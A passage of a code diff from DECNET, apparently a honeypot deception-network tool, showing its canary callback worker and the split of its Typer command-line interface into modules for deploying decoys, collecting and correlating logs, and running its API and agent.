    log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
    return transport
 # ---------------------------- entry point --------------------------------
 async def run() -> None:
    """Worker entry point — kicked off by ``decnet canary``.
    Initializes the repository, connects the bus, starts the optional
    DNS listener and then serves the HTTP app until uvicorn returns.
    Everything after the bus connects runs under one ``try/finally``,
    so a failure while building the app or binding the DNS socket
    still closes the bus (and the DNS transport, if it was opened)
    before the error propagates.
    """
    import uvicorn
    repo = get_repository()
    await repo.initialize()
    bus = get_bus()
    await bus.connect()
    dns_transport: Optional[asyncio.DatagramTransport] = None
    try:
        app = _build_app(repo, bus)
        config = uvicorn.Config(
            app,
            host=_http_bind(),
            port=_http_port(),
            log_level="warning",
            access_log=False,  # stealth: no per-request lines
            server_header=False,  # we set Server: nginx in middleware
        )
        server = uvicorn.Server(config)
        loop = asyncio.get_running_loop()
        dns_transport = await _start_dns_server(repo, bus, loop=loop)
        await server.serve()
    finally:
        if dns_transport is not None:
            dns_transport.close()
        await bus.close()
 def main() -> None:
    """Synchronous CLI entry point: drive :func:`run` to completion with ``asyncio.run``."""
    worker = run()
    asyncio.run(worker)
--- a/decnet/cli.py
+++ b/decnet/cli.py
@@ -1,478 +0,0 @@
 """
 DECNET CLI — entry point for all commands.
 Usage:
  decnet deploy --mode unihost --deckies 5 --randomize-services
  decnet status
  decnet teardown [--all | --id decky-01]
  decnet services
 """
 import signal
 from typing import Optional
 import typer
 from rich.console import Console
 from rich.table import Table
 from decnet.env import (
    DECNET_API_HOST,
    DECNET_API_PORT,
    DECNET_INGEST_LOG_FILE,
    DECNET_WEB_HOST,
    DECNET_WEB_PORT,
 )
 from decnet.archetypes import Archetype, all_archetypes, get_archetype
 from decnet.config import (
    DecnetConfig,
 )
 from decnet.distros import all_distros, get_distro
 from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
 from decnet.ini_loader import load_ini
 from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
 from decnet.services.registry import all_services
 app = typer.Typer(
    name="decnet",
    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
 )
 console = Console()
 def _kill_api() -> None:
    """Find and kill any running DECNET API (uvicorn) or mutator processes.
    Scans the process table and sends SIGTERM to every process whose
    command line matches the DECNET API (``uvicorn decnet.web.api:app``)
    or the mutator watcher (``decnet.cli mutate --watch``).  Processes
    that disappear or cannot be signalled are skipped instead of
    aborting the scan.
    """
    import psutil
    import os
    _killed: bool = False
    for _proc in psutil.process_iter(['pid', 'name', 'cmdline']):
        try:
            _cmd = _proc.info['cmdline']
            if not _cmd:
                continue
            # ``_cmd`` is the argv list, so these are whole-argument matches.
            if "uvicorn" in _cmd and "decnet.web.api:app" in _cmd:
                _label = "DECNET API"
            elif "decnet.cli" in _cmd and "mutate" in _cmd and "--watch" in _cmd:
                _label = "DECNET Mutator Watcher"
            else:
                continue
            console.print(f"[yellow]Stopping {_label} (PID {_proc.info['pid']})...[/]")
            os.kill(_proc.info['pid'], signal.SIGTERM)
            _killed = True
        except (
            psutil.NoSuchProcess,
            psutil.AccessDenied,
            # os.kill raises plain OSError subclasses, not psutil errors,
            # when the process exits between the scan and the signal or
            # belongs to another user.
            ProcessLookupError,
            PermissionError,
        ):
            continue
    if _killed:
        console.print("[green]Background processes stopped.[/]")
@app.command()
def api(
    port: int = typer.Option(DECNET_API_PORT, "--port", help="Port for the backend API"),
    host: str = typer.Option(DECNET_API_HOST, "--host", help="Host IP for the backend API"),
    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Path to the DECNET log file to monitor"),
) -> None:
    """Run the DECNET API and Web Dashboard in standalone mode."""
    # The docstring above is kept verbatim: typer shows it as help text.
    import os
    import subprocess  # nosec B404
    import sys
    console.print(f"[green]Starting DECNET API on {host}:{port}...[/]")
    # Child environment: a copy of ours, with the log path the API should tail.
    child_env: dict[str, str] = os.environ.copy()
    child_env["DECNET_INGEST_LOG_FILE"] = str(log_file)
    uvicorn_cmd = [
        sys.executable, "-m", "uvicorn", "decnet.web.api:app",
        "--host", host, "--port", str(port),
    ]
    try:
        # Runs in the foreground until uvicorn exits.
        subprocess.run(uvicorn_cmd, env=child_env)  # nosec B603 B404
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the foreground server.
        pass
    except (FileNotFoundError, subprocess.SubprocessError):
        console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
@app.command()
def deploy(
    mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
    deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
    interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
    subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
    ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
    services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
    randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
    distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
    randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
    log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
    archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
    mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
    dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
    no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
    parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
    ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
    config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
    api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
    api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
) -> None:
    """Deploy deckies to the LAN."""
    # The docstring above is kept verbatim: typer shows it as help text.
    #
    # Flow: resolve the network settings and decky list (from the INI
    # file when --config is given, otherwise from the CLI flags), hand
    # the resulting DecnetConfig to the engine, then spawn the
    # background helpers (mutator watcher, log collector, API) unless
    # this is a dry run.
    import os
    if mode not in ("unihost", "swarm"):
        console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
        raise typer.Exit(1)
    # ------------------------------------------------------------------ #
    # Config-file path                                                     #
    # ------------------------------------------------------------------ #
    if config_file:
        try:
            ini = load_ini(config_file)
        except FileNotFoundError as e:
            console.print(f"[red]{e}[/]")
            raise typer.Exit(1)
        # CLI flags win over the INI values, which win over auto-detection.
        iface = interface or ini.interface or detect_interface()
        subnet_cidr = subnet or ini.subnet
        effective_gateway = ini.gateway
        if subnet_cidr is None:
            subnet_cidr, effective_gateway = detect_subnet(iface)
        elif effective_gateway is None:
            _, effective_gateway = detect_subnet(iface)
        host_ip = get_host_ip(iface)
        console.print(f"[dim]Config:[/] {config_file}  [dim]Interface:[/] {iface}  "
                      f"[dim]Subnet:[/] {subnet_cidr}  [dim]Gateway:[/] {effective_gateway}  "
                      f"[dim]Host IP:[/] {host_ip}")
        if ini.custom_services:
            from decnet.custom_service import CustomService
            from decnet.services.registry import register_custom_service
            for cs in ini.custom_services:
                register_custom_service(
                    CustomService(
                        name=cs.name,
                        image=cs.image,
                        exec_cmd=cs.exec_cmd,
                        ports=cs.ports,
                    )
                )
        effective_log_file = log_file
        try:
            decky_configs = build_deckies_from_ini(
                ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
            )
        except ValueError as e:
            console.print(f"[red]{e}[/]")
            raise typer.Exit(1)
    # ------------------------------------------------------------------ #
    # Classic CLI path                                                     #
    # ------------------------------------------------------------------ #
    else:
        if deckies is None:
            console.print("[red]--deckies is required when --config is not used.[/]")
            raise typer.Exit(1)
        services_list = [s.strip() for s in services.split(",")] if services else None
        if services_list:
            known = set(all_service_names())
            unknown = [s for s in services_list if s not in known]
            if unknown:
                console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
                raise typer.Exit(1)
        arch: Archetype | None = None
        if archetype_name:
            try:
                arch = get_archetype(archetype_name)
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        if not services_list and not randomize_services and not arch:
            console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
            raise typer.Exit(1)
        iface = interface or detect_interface()
        if subnet is None:
            subnet_cidr, effective_gateway = detect_subnet(iface)
        else:
            # Explicit subnet: only the gateway comes from detection.
            subnet_cidr = subnet
            _, effective_gateway = detect_subnet(iface)
        host_ip = get_host_ip(iface)
        console.print(f"[dim]Interface:[/] {iface}  [dim]Subnet:[/] {subnet_cidr}  "
                      f"[dim]Gateway:[/] {effective_gateway}  [dim]Host IP:[/] {host_ip}")
        distros_list = [d.strip() for d in distro.split(",")] if distro else None
        if distros_list:
            # get_distro raises ValueError for an unknown slug; the
            # lookup is done purely for validation.
            try:
                for slug in distros_list:
                    get_distro(slug)
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
        decky_configs = build_deckies(
            deckies, ips, services_list, randomize_services,
            distros_explicit=distros_list, randomize_distros=randomize_distros,
            archetype=arch, mutate_interval=mutate_interval,
        )
        effective_log_file = log_file
    if api and not effective_log_file:
        effective_log_file = os.path.join(os.getcwd(), "decnet.log")
        console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")
    config = DecnetConfig(
        mode=mode,
        interface=iface,
        subnet=subnet_cidr,
        gateway=effective_gateway,
        deckies=decky_configs,
        log_file=effective_log_file,
        ipvlan=ipvlan,
        mutate_interval=mutate_interval,
    )
    from decnet.engine import deploy as _deploy
    _deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
    if mutate_interval is not None and not dry_run:
        import subprocess  # nosec B404
        import sys
        console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
        try:
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start mutator watcher.[/]")
    if effective_log_file and not dry_run and not api:
        import subprocess  # nosec B404
        import sys
        from pathlib import Path as _Path
        _collector_err = _Path(effective_log_file).with_suffix(".collector.log")
        console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
        # The child receives its own duplicate of the descriptor, so
        # the parent's handle is closed as soon as the spawn returns
        # instead of leaking for the rest of the process lifetime.
        with open(_collector_err, "a") as _collector_out:
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
                stdin=subprocess.DEVNULL,
                stdout=_collector_out,
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
    if api and not dry_run:
        import subprocess  # nosec B404
        import sys
        console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
        _env: dict[str, str] = os.environ.copy()
        _env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
        try:
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
                env=_env,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.STDOUT
            )
            console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
@app.command()
def collect(
    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write RFC 5424 syslog lines and .json records"),
) -> None:
    """Stream Docker logs from all running decky service containers to a log file."""
    # The docstring above is kept verbatim: typer shows it as help text.
    import asyncio
    from decnet.collector import log_collector_worker
    console.print(f"[bold cyan]Collector starting[/] → {log_file}")
    # Blocks until the collector coroutine finishes.
    worker = log_collector_worker(log_file)
    asyncio.run(worker)
@app.command()
def mutate(
    watch: bool = typer.Option(False, "--watch", "-w", help="Run continuously and mutate deckies according to their interval"),
    decky_name: Optional[str] = typer.Option(None, "--decky", "-d", help="Force mutate a specific decky immediately"),
    force_all: bool = typer.Option(False, "--all", help="Force mutate all deckies immediately"),
) -> None:
    """Manually trigger or continuously watch for decky mutation."""
    # The docstring above is kept verbatim: typer shows it as help text.
    import asyncio
    from decnet.mutator import mutate_decky, mutate_all, run_watch_loop
    from decnet.web.dependencies import repo
    async def _dispatch() -> None:
        await repo.initialize()
        # Precedence: --watch, then --decky, then --all / default sweep.
        if watch:
            await run_watch_loop(repo)
            return
        if decky_name:
            await mutate_decky(decky_name, repo)
            return
        # With --all every decky is forced; without it the sweep is unforced.
        await mutate_all(force=bool(force_all), repo=repo)
    asyncio.run(_dispatch())
@app.command()
def status() -> None:
    """Show running deckies and their status."""
    # Thin wrapper: the engine does the reporting.  The import is
    # local, as in the other commands of this module.
    from decnet.engine import status as show_status
    show_status()
@app.command()
def teardown(
    all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
    id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
) -> None:
    """Stop and remove deckies."""
    # The docstring above is kept verbatim: typer shows it as help text.
    target_given = all_ or id_
    if not target_given:
        console.print("[red]Specify --all or --id <name>.[/]")
        raise typer.Exit(1)
    from decnet.engine import teardown as engine_teardown
    engine_teardown(decky_id=id_)
    # A full teardown also stops the background API / mutator processes.
    if all_:
        _kill_api()
@app.command(name="services")
def list_services() -> None:
    """List all registered honeypot service plugins."""
    # The docstring above is kept verbatim: typer shows it as help text.
    registry = all_services()
    table = Table(title="Available Services", show_lines=True)
    table.add_column("Name", style="bold cyan")
    for heading in ("Ports", "Image"):
        table.add_column(heading)
    # One row per service, ordered by name.
    for name, svc in sorted(registry.items()):
        port_list = ", ".join(map(str, svc.ports))
        table.add_row(name, port_list, svc.default_image)
    console.print(table)
@app.command(name="distros")
def list_distros() -> None:
    """List all available OS distro profiles for deckies."""
    # The docstring above is kept verbatim: typer shows it as help text.
    table = Table(title="Available Distro Profiles", show_lines=True)
    column_specs = (
        ("Slug", {"style": "bold cyan"}),
        ("Display Name", {}),
        ("Docker Image", {"style": "dim"}),
    )
    for heading, options in column_specs:
        table.add_column(heading, **options)
    # One row per profile, ordered by slug.
    profiles = sorted(all_distros().items())
    for slug, profile in profiles:
        table.add_row(slug, profile.display_name, profile.image)
    console.print(table)
@app.command(name="correlate")
def correlate(
    log_file: Optional[str] = typer.Option(None, "--log-file", "-f", help="Path to DECNET syslog file to analyse"),
    min_deckies: int = typer.Option(2, "--min-deckies", "-m", help="Minimum number of distinct deckies an IP must touch to be reported"),
    output: str = typer.Option("table", "--output", "-o", help="Output format: table | json | syslog"),
    emit_syslog: bool = typer.Option(False, "--emit-syslog", help="Also print traversal events as RFC 5424 lines (for SIEM piping)"),
) -> None:
    """Analyse logs for cross-decky traversals and print the attacker movement graph."""
    import sys
    import json as _json
    from pathlib import Path
    from decnet.correlation.engine import CorrelationEngine
    # Reject unknown formats up front (before any input is consumed) instead
    # of silently falling back to the table view.
    if output not in ("table", "json", "syslog"):
        console.print(f"[red]Invalid --output '{output}'. Expected: table | json | syslog.[/]")
        raise typer.Exit(1)
    engine = CorrelationEngine()
    # Input source: an explicit file wins; otherwise piped stdin; otherwise error.
    if log_file:
        path = Path(log_file)
        if not path.exists():
            console.print(f"[red]Log file not found: {log_file}[/]")
            raise typer.Exit(1)
        engine.ingest_file(path)
    elif not sys.stdin.isatty():
        for line in sys.stdin:
            engine.ingest(line)
    else:
        console.print("[red]Provide --log-file or pipe log data via stdin.[/]")
        raise typer.Exit(1)
    traversals = engine.traversals(min_deckies)
    if output == "json":
        console.print_json(_json.dumps(engine.report_json(min_deckies), indent=2))
    elif output == "syslog":
        for line in engine.traversal_syslog_lines(min_deckies):
            typer.echo(line)
    else:
        if not traversals:
            console.print(
                f"[yellow]No traversals detected "
                f"(min_deckies={min_deckies}, events_indexed={engine.events_indexed}).[/]"
            )
        else:
            console.print(engine.report_table(min_deckies))
            console.print(
                f"[dim]Parsed {engine.lines_parsed} lines · "
                f"indexed {engine.events_indexed} events · "
                f"{len(engine.all_attackers())} unique IPs · "
                f"[bold]{len(traversals)}[/] traversal(s)[/]"
            )
    # With --output syslog the RFC 5424 lines were already written above;
    # emitting them again would duplicate every event for a downstream SIEM.
    if emit_syslog and output != "syslog":
        for line in engine.traversal_syslog_lines(min_deckies):
            typer.echo(line)
@app.command(name="archetypes")
def list_archetypes() -> None:
    """List all machine archetype profiles."""
    table = Table(title="Machine Archetypes", show_lines=True)
    # (header, style) per column; None means no explicit style is passed.
    for header, style in (
        ("Slug", "bold cyan"),
        ("Display Name", None),
        ("Default Services", "green"),
        ("Description", "dim"),
    ):
        if style is None:
            table.add_column(header)
        else:
            table.add_column(header, style=style)
    catalogue = all_archetypes()
    # Rows are ordered by slug.
    for slug in sorted(catalogue):
        arch = catalogue[slug]
        services_cell = ", ".join(arch.services)
        table.add_row(slug, arch.display_name, services_cell, arch.description)
    console.print(table)
@app.command(name="web")
def serve_web(
    web_port: int = typer.Option(DECNET_WEB_PORT, "--web-port", help="Port to serve the DECNET Web Dashboard"),
    host: str = typer.Option(DECNET_WEB_HOST, "--host", help="Host IP to serve the Web Dashboard"),
) -> None:
    """Serve the DECNET Web Dashboard frontend."""
    import functools
    import http.server
    import socketserver
    from pathlib import Path
    dist_dir = Path(__file__).parent.parent / "decnet_web" / "dist"
    if not dist_dir.exists():
        console.print(f"[red]Frontend build not found at {dist_dir}. Make sure you run 'npm run build' inside 'decnet_web'.[/]")
        raise typer.Exit(1)
    class SPAHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
        # Single-page-app fallback: any request that does not resolve to a
        # regular file under the served directory is answered with index.html.
        def do_GET(self):
            path = self.translate_path(self.path)
            if not Path(path).exists() or Path(path).is_dir():
                self.path = "/index.html"
            return super().do_GET()
    class _ReusableTCPServer(socketserver.TCPServer):
        # Allow re-binding right after a restart instead of failing with
        # "Address already in use" while old sockets linger in TIME_WAIT.
        allow_reuse_address = True
    # Bind the handler to dist_dir through its ``directory`` argument rather
    # than os.chdir(), so the process-wide working directory is left untouched.
    handler = functools.partial(SPAHTTPRequestHandler, directory=str(dist_dir.resolve()))
    with _ReusableTCPServer((host, web_port), handler) as httpd:
        console.print(f"[green]Serving DECNET Web Dashboard on http://{host}:{web_port}[/]")
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            console.print("\n[dim]Shutting down dashboard server.[/]")
 if __name__ == '__main__':  # pragma: no cover
    app()
--- a/decnet/cli/__init__.py
+++ b/decnet/cli/__init__.py
@@ -0,0 +1,92 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 DECNET CLI — entry point for all commands.
 Usage:
  decnet deploy --mode unihost --deckies 5 --randomize-services
  decnet status
  decnet teardown [--all | --id decky-01]
  decnet services
 Layout: each command module exports ``register(app)`` which attaches its
 commands to the passed Typer app. ``__init__.py`` builds the root app,
 calls every module's ``register`` in order, then runs the master-only
 gate. The gate must fire LAST so it sees the fully-populated dispatch
 table before filtering.
 """
 from __future__ import annotations
 import typer
 from . import (
    agent,
    api,
    bus,
    canary,
    db,
    deploy,
    forwarder,
    geoip,
    init,
    inventory,
    lifecycle,
    listener,
    orchestrator,
    profiler,
    realism,
    reconciler,
    sniffer,
    swarm,
    swarmctl,
    topology,
    ttp,
    updater,
    web,
    webhook,
    workers,
 )
 from .gating import _gate_commands_by_mode
 from .utils import console as console, log as log
 app = typer.Typer(
    name="decnet",
    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
 )
 # Order matches the old flat layout so `decnet --help` reads the same.
 # Every command module imported above appears exactly once in this tuple.
 for _mod in (
    api, swarmctl, agent, updater, listener, forwarder,
    swarm,
    deploy, lifecycle, workers, inventory,
    web, profiler, orchestrator, realism, reconciler, sniffer, db,
    topology, bus, geoip, init, webhook, canary, ttp,
 ):
    _mod.register(app)
 # Must run after every register() call: per the module docstring, the gate
 # needs the fully-populated dispatch table before it filters commands.
 _gate_commands_by_mode(app)
 # Backwards-compat re-exports. Tests and third-party tooling import these
 # directly from ``decnet.cli``; the refactor must keep them resolvable.
 from .db import _db_reset_mysql_async  # noqa: E402,F401
 from .gating import (  # noqa: E402,F401
    MASTER_ONLY_COMMANDS,
    MASTER_ONLY_GROUPS,
    _agent_mode_active,
    _require_master_mode,
 )
 from .utils import (  # noqa: E402,F401
    _daemonize,
    _http_request,
    _is_running,
    _kill_all_services,
    _pid_dir,
    _service_registry,
    _spawn_detached,
    _swarmctl_base_url,
 )
 if __name__ == "__main__":  # pragma: no cover
    app()
--- a/decnet/cli/agent.py
+++ b/decnet/cli/agent.py
@@ -0,0 +1,65 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import pathlib as _pathlib
 import sys as _sys
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``agent`` command to *app*."""
    @app.command()
    def agent(
        port: int = typer.Option(8765, "--port", help="Port for the worker agent"),
        host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the worker agent"),  # nosec B104
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent, expanded under the running user's HOME — set this when running as sudo/root)"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_forwarder: bool = typer.Option(False, "--no-forwarder", help="Do not auto-spawn the log forwarder alongside the agent"),
    ) -> None:
        """Run the DECNET SWARM worker agent (requires a cert bundle in ~/.decnet/agent/).
        By default, `decnet agent` auto-spawns `decnet forwarder` as a fully-
        detached sibling process so worker logs start flowing to the master
        without a second manual invocation. The forwarder survives agent
        restarts and crashes — if it dies on its own, restart it manually
        with `decnet forwarder --daemon …`. Pass --no-forwarder to skip.
        """
        from decnet.agent import server as _agent_server
        from decnet.env import DECNET_SWARM_MASTER_HOST, DECNET_AGENT_LOG_FILE
        from decnet.swarm import pki as _pki
        # An explicit --agent-dir wins; otherwise use the PKI module's default.
        resolved_dir = _pathlib.Path(agent_dir) if agent_dir else _pki.DEFAULT_AGENT_DIR
        if daemon:
            log.info("agent daemonizing host=%s port=%d", host, port)
            _utils._daemonize()
        if not no_forwarder and DECNET_SWARM_MASTER_HOST:
            # Forwarder auto-spawn is best-effort. Building the argv parses
            # DECNET_SWARM_SYSLOG_PORT with int(), so it lives inside the try:
            # a malformed value is reported as a skipped auto-spawn instead of
            # aborting the agent with a traceback.
            try:
                fw_argv = [
                    _sys.executable, "-m", "decnet", "forwarder",
                    "--master-host", DECNET_SWARM_MASTER_HOST,
                    "--master-port", str(int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))),
                    "--agent-dir", str(resolved_dir),
                    "--log-file", str(DECNET_AGENT_LOG_FILE),
                    "--daemon",
                ]
                pid = _utils._spawn_detached(fw_argv, _utils._pid_dir() / "forwarder.pid")
                log.info("agent auto-spawned forwarder pid=%d master=%s", pid, DECNET_SWARM_MASTER_HOST)
                console.print(f"[dim]Auto-spawned forwarder (pid {pid}) → {DECNET_SWARM_MASTER_HOST}.[/]")
            except Exception as e:  # noqa: BLE001
                log.warning("agent could not auto-spawn forwarder: %s", e)
                console.print(f"[yellow]forwarder auto-spawn skipped: {e}[/]")
        elif not no_forwarder:
            log.info("agent skipping forwarder auto-spawn (DECNET_SWARM_MASTER_HOST unset)")
        log.info("agent command invoked host=%s port=%d dir=%s", host, port, resolved_dir)
        console.print(f"[green]Starting DECNET worker agent on {host}:{port} (mTLS)...[/]")
        # The server's return code becomes the process exit status when non-zero.
        rc = _agent_server.run(host, port, agent_dir=resolved_dir)
        if rc != 0:
            raise typer.Exit(rc)
--- a/decnet/cli/api.py
+++ b/decnet/cli/api.py
@@ -0,0 +1,54 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import signal
 import subprocess  # nosec B404
 import sys
 import typer
 from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``api`` command to *app*."""
    @app.command()
    def api(
        port: int = typer.Option(DECNET_API_PORT, "--port", help="Port for the backend API"),
        host: str = typer.Option(DECNET_API_HOST, "--host", help="Host IP for the backend API"),
        log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Path to the DECNET log file to monitor"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        workers: int = typer.Option(1, "--workers", "-w", min=1, help="Number of uvicorn worker processes"),
    ) -> None:
        """Run the DECNET API and Web Dashboard in standalone mode."""
        _require_master_mode("api")
        if daemon:
            log.info("API daemonizing host=%s port=%d workers=%d", host, port, workers)
            _utils._daemonize()
        log.info("API command invoked host=%s port=%d workers=%d", host, port, workers)
        console.print(f"[green]Starting DECNET API on {host}:{port} (workers={workers})...[/]")
        # The child inherits the current environment, with the --log-file
        # value exported as DECNET_INGEST_LOG_FILE.
        _env: dict[str, str] = os.environ.copy()
        _env["DECNET_INGEST_LOG_FILE"] = str(log_file)
        _cmd = [sys.executable, "-m", "uvicorn", "decnet.web.api:app",
                "--host", host, "--port", str(port), "--workers", str(workers)]
        try:
            # start_new_session=True gives uvicorn its own process group so
            # the whole group can be signalled via killpg on Ctrl-C.
            proc = subprocess.Popen(_cmd, env=_env, start_new_session=True)  # nosec B603 B404
            try:
                proc.wait()
            except KeyboardInterrupt:
                try:
                    # Graceful stop first; escalate to SIGKILL after 10 seconds.
                    os.killpg(proc.pid, signal.SIGTERM)
                    try:
                        proc.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        os.killpg(proc.pid, signal.SIGKILL)
                        proc.wait()
                except ProcessLookupError:
                    # The process group is already gone; nothing left to stop.
                    pass
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
            # Report the failure through the exit status too, so scripts and
            # service managers do not see a failed launch as success.
            raise typer.Exit(1) from None
--- a/decnet/cli/bus.py
+++ b/decnet/cli/bus.py
@@ -0,0 +1,46 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``bus`` command to *app*."""
    @app.command(name="bus")
    def bus_cmd(
        socket_path: str = typer.Option(
            None, "--socket", "-s",
            help="UNIX socket path (defaults to DECNET_BUS_SOCKET env var, "
                 "then /run/decnet/bus.sock, then ~/.decnet/bus.sock).",
        ),
        group: str = typer.Option(
            "decnet", "--group", "-g",
            help="POSIX group to chown the socket to (falls back to process "
                 "group if the named group does not exist).",
        ),
        heartbeat: int = typer.Option(
            10, "--heartbeat", "-H",
            help="Seconds between system.bus.health heartbeat events.",
        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process."),
    ) -> None:
        """Run the DECNET ServiceBus worker (host-local UNIX-socket pub/sub)."""
        import asyncio
        from decnet.bus.factory import _default_socket_path
        from decnet.bus.worker import bus_worker
        # An explicit --socket wins; the factory default is only consulted
        # when the option was omitted (or empty).
        sock = socket_path if socket_path else _default_socket_path()
        if daemon:
            log.info("bus daemonizing socket=%s", sock)
            _utils._daemonize()
        log.info("bus starting socket=%s group=%s heartbeat=%ds", sock, group, heartbeat)
        console.print(f"[bold cyan]Bus starting[/] (socket: {sock}, heartbeat: {heartbeat}s)")
        try:
            asyncio.run(bus_worker(sock, group=group, heartbeat_interval=heartbeat))
        except KeyboardInterrupt:
            # Ctrl-C is the expected way to stop a foreground worker.
            console.print("\n[yellow]Bus stopped.[/]")
--- a/decnet/cli/canary.py
+++ b/decnet/cli/canary.py
@@ -0,0 +1,104 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
 Two entry points share this module:
 * ``decnet canary`` — runs the worker process. Mirrors the shape of
  :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
  systemd unit so its argv must stay stable.
 * ``decnet canary-install-toolchain`` — provisions the Node side of
  the fingerprint-canary obfuscator. Idempotent; safe to call from
  the API service unit's ``ExecStartPre``.
 Not master-only — any host that hosts deckies can run its own
 canary worker (the bus events stay local; the webhook worker on
 each host fans them out to SIEMs independently per the design
 in ``development/let-s-move-to-the-enumerated-pike.md``).
 """
 from __future__ import annotations
 import shutil
 import subprocess  # nosec B404 — npm exec is the whole point of the toolchain installer
 from pathlib import Path
 import typer
 from . import utils as _utils
 from .utils import console, log
 _TOOLCHAIN_TIMEOUT_S = 180
 def register(app: typer.Typer) -> None:
    """Attach ``canary`` and ``canary-install-toolchain`` to *app*."""
    @app.command(name="canary")
    def canary_cmd(
        daemon: bool = typer.Option(
            False, "--daemon", "-d", help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Run the canary HTTP + DNS callback receiver."""
        import asyncio
